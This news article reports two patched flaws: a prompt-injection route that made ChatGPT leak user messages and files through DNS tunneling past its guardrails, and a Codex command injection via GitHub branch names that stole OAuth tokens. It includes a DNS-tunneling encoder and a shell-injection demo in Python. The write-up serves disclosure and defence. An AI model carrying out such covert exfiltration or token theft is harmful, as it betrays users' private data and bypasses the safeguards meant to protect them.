OpenAI patches critical ChatGPT and Codex security vulnerabilities exposing user data and tokens

Reviewed by Nidhi Govil


OpenAI addressed two critical security vulnerabilities in February 2026. Check Point discovered a ChatGPT flaw enabling silent data exfiltration through DNS tunneling, bypassing AI guardrails without user consent. BeyondTrust found a command injection vulnerability in Codex allowing GitHub token theft through malicious branch names, potentially compromising enterprise organizations.

ChatGPT Security Vulnerability Enables Silent Data Exfiltration

OpenAI patched a critical security vulnerability in ChatGPT on February 20, 2026, following responsible disclosure by Check Point Research. The flaw allowed attackers to exfiltrate sensitive user data without triggering any warnings or requiring user consent, creating what cybersecurity experts described as a dangerous blind spot in AI systems [1].

Source: CXOToday


The vulnerability exploited a hidden DNS-based communication path within the Linux runtime ChatGPT uses for code execution and data analysis, effectively bypassing the platform's built-in guardrails designed to prevent unauthorized data sharing [2].

The attack relied on DNS tunneling, a technique that encodes information into domain-name queries rather than conventional HTTP or API channels. Because DNS resolution remained available as part of normal system operation, ChatGPT did not flag the activity as risky behavior requiring user approval [2]. Check Point researchers demonstrated that a single malicious prompt could turn ordinary conversations into covert exfiltration channels, leaking user messages, uploaded files, and other sensitive data without detection [1].
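To make the mechanism concrete, here is a minimal sketch of how DNS tunneling encodes data into queries. This is an illustrative reconstruction of the general technique, not Check Point's actual payload; the domain `exfil.example.com` and the function name are hypothetical.

```python
import base64

def encode_for_dns(secret: str, attacker_domain: str, label_len: int = 60):
    """Illustrative DNS-tunneling encoder (hypothetical, for explanation only).

    Data is base32-encoded (DNS labels are case-insensitive and limited to
    letters, digits, and hyphens), split into labels of at most 63 characters,
    and prepended to an attacker-controlled domain. Each resulting hostname,
    when resolved, delivers its labels to the attacker's authoritative
    nameserver, which simply logs the queries.
    """
    encoded = base64.b32encode(secret.encode()).decode().rstrip("=").lower()
    chunks = [encoded[i:i + label_len] for i in range(0, len(encoded), label_len)]
    # A sequence number lets the attacker reassemble chunks in order.
    return [f"{chunk}.{i}.{attacker_domain}" for i, chunk in enumerate(chunks)]

queries = encode_for_dns("patient lab results", "exfil.example.com")
for q in queries:
    print(q)
```

Because these lookups are indistinguishable from ordinary name resolution at the sandbox boundary, blocking them outright would break legitimate functionality, which is why the technique evades consent prompts.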

Source: Hacker News


Prompt Injection Attacks Threaten Privacy

The vulnerability becomes particularly concerning when considering how users interact with ChatGPT in enterprise and personal contexts. With OpenAI serving more than 800 million users weekly as of late 2025, and users sending approximately 18 billion messages weekly by July 2025, the potential impact extends far beyond casual chatbot interactions [5]. People routinely upload highly sensitive information, including medical reports, financial spreadsheets, contracts, and confidential business documents, assuming their data remains secure within the platform.

Attackers could mount prompt injection attacks by disguising malicious prompts as productivity hacks or premium feature unlocks, convincing users to paste specially crafted instructions [1]. The threat escalates significantly with custom GPTs, where malicious logic can be embedded directly into the application with no further user interaction required. For instance, a backdoored GPT posing as a personal medical advisor could silently exfiltrate lab results and patient information to attacker-controlled servers [2].

What makes this vulnerability particularly insidious is that attackers do not need complete documents. ChatGPT's analytical capabilities mean the model can extract and summarize the most critical insights from lengthy files, leaking condensed versions containing only the most valuable information [5]. This is not just document theft, but theft of processed intelligence.

Command Injection Vulnerability Compromises OpenAI Codex

In parallel with the ChatGPT disclosure, BeyondTrust's Phantom Labs revealed a separate command injection vulnerability affecting OpenAI Codex, the cloud-based software engineering agent integrated into ChatGPT [3]. The flaw stemmed from improper input validation when processing GitHub branch names during task creation, allowing attackers to inject arbitrary shell commands into the container environment [4].
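The vulnerability class is easy to demonstrate. The sketch below is a hypothetical reconstruction, not Codex's actual code: `echo` stands in for the real git invocation so the demo is harmless, and the branch name plays the role of attacker-controlled input.

```python
import subprocess

# Attacker-controlled branch name: the ';' smuggles in a second command.
branch = "main; echo INJECTED"

# Vulnerable pattern: the branch text is interpolated into a shell string,
# so the shell parses the ';' and executes the injected command.
vuln = subprocess.run(f"echo checking out {branch}",
                      shell=True, capture_output=True, text=True)

# Safer pattern: pass an argv list so no shell ever parses the name and
# the ';' remains a literal character in a single argument.
safe = subprocess.run(["echo", "checking out", branch],
                      capture_output=True, text=True)

print(vuln.stdout)  # the injected second command actually ran
print(safe.stdout)  # the branch name is printed verbatim, inert
```

In the Codex scenario, the injected command could read the container's GitHub credentials instead of printing a marker string, which is how token theft becomes possible.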

Source: SiliconANGLE


Researchers demonstrated they could steal the GitHub OAuth tokens Codex uses to authenticate with repositories, potentially enabling lateral movement within GitHub environments [3]. The vulnerability affected Codex's web interface, command-line interface, SDK, and IDE integrations, creating multiple attack vectors [1].

More alarmingly, attackers could scale exploitation by embedding malicious payloads directly into GitHub branch names, potentially compromising every developer working on a shared repository [4]. This expanded attack surface poses significant risks to developer workflows in enterprise organizations where Codex may hold broad permissions across multiple projects.

OpenAI Implements Comprehensive Security Fixes

OpenAI addressed both vulnerabilities through coordinated patches deployed on February 20, 2026. For the Codex flaw, the company implemented improved input validation, stronger shell-escaping protections, and tighter controls around token exposure within container environments [4]. Additional measures limited token scope and lifetime during task execution to minimize the damage any future exploit could cause.
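The mitigation pattern described, validating untrusted names and escaping anything that must touch a shell, can be sketched as follows. This is an assumed, generic hardening pattern, not OpenAI's actual patch; the regex and function names are illustrative.

```python
import re
import shlex

# Conservative allowlist for branch names: alphanumeric start, then a
# limited character set, bounded length. Real git ref rules are looser,
# but rejecting ambiguity is the point of validation.
BRANCH_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._/-]{0,200}$")

def validate_branch(name: str) -> str:
    """Reject names containing shell metacharacters or path tricks."""
    if not BRANCH_RE.fullmatch(name) or ".." in name:
        raise ValueError(f"rejected branch name: {name!r}")
    return name

def shell_safe(name: str) -> str:
    """Defense in depth: quote even an already-validated name before it
    is ever embedded in a shell string."""
    return shlex.quote(validate_branch(name))

print(shell_safe("feature/login-2"))
```

Combined with short-lived, narrowly scoped tokens inside the container, this layered approach means a bypass of any single control no longer yields credential theft on its own.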

Crucially, there is no evidence that either vulnerability was exploited maliciously in the wild before disclosure [1]. However, cybersecurity experts emphasize that these incidents reveal a fundamental truth about AI security. "This research reinforces a hard truth for the AI era: don't assume AI tools are secure by default," said Eli Smadja, head of research at Check Point Research [1].

The discoveries highlight how AI platforms have evolved into full computing environments handling sensitive data, yet their native security controls are insufficient on their own. Organizations deploying AI systems must implement independent visibility and layered protection rather than relying solely on vendor safeguards [1]. As AI agents become more deeply integrated into enterprise workflows, security teams must treat the containers they operate in, and the input they consume, with the same rigor applied to traditional application security boundaries [4].
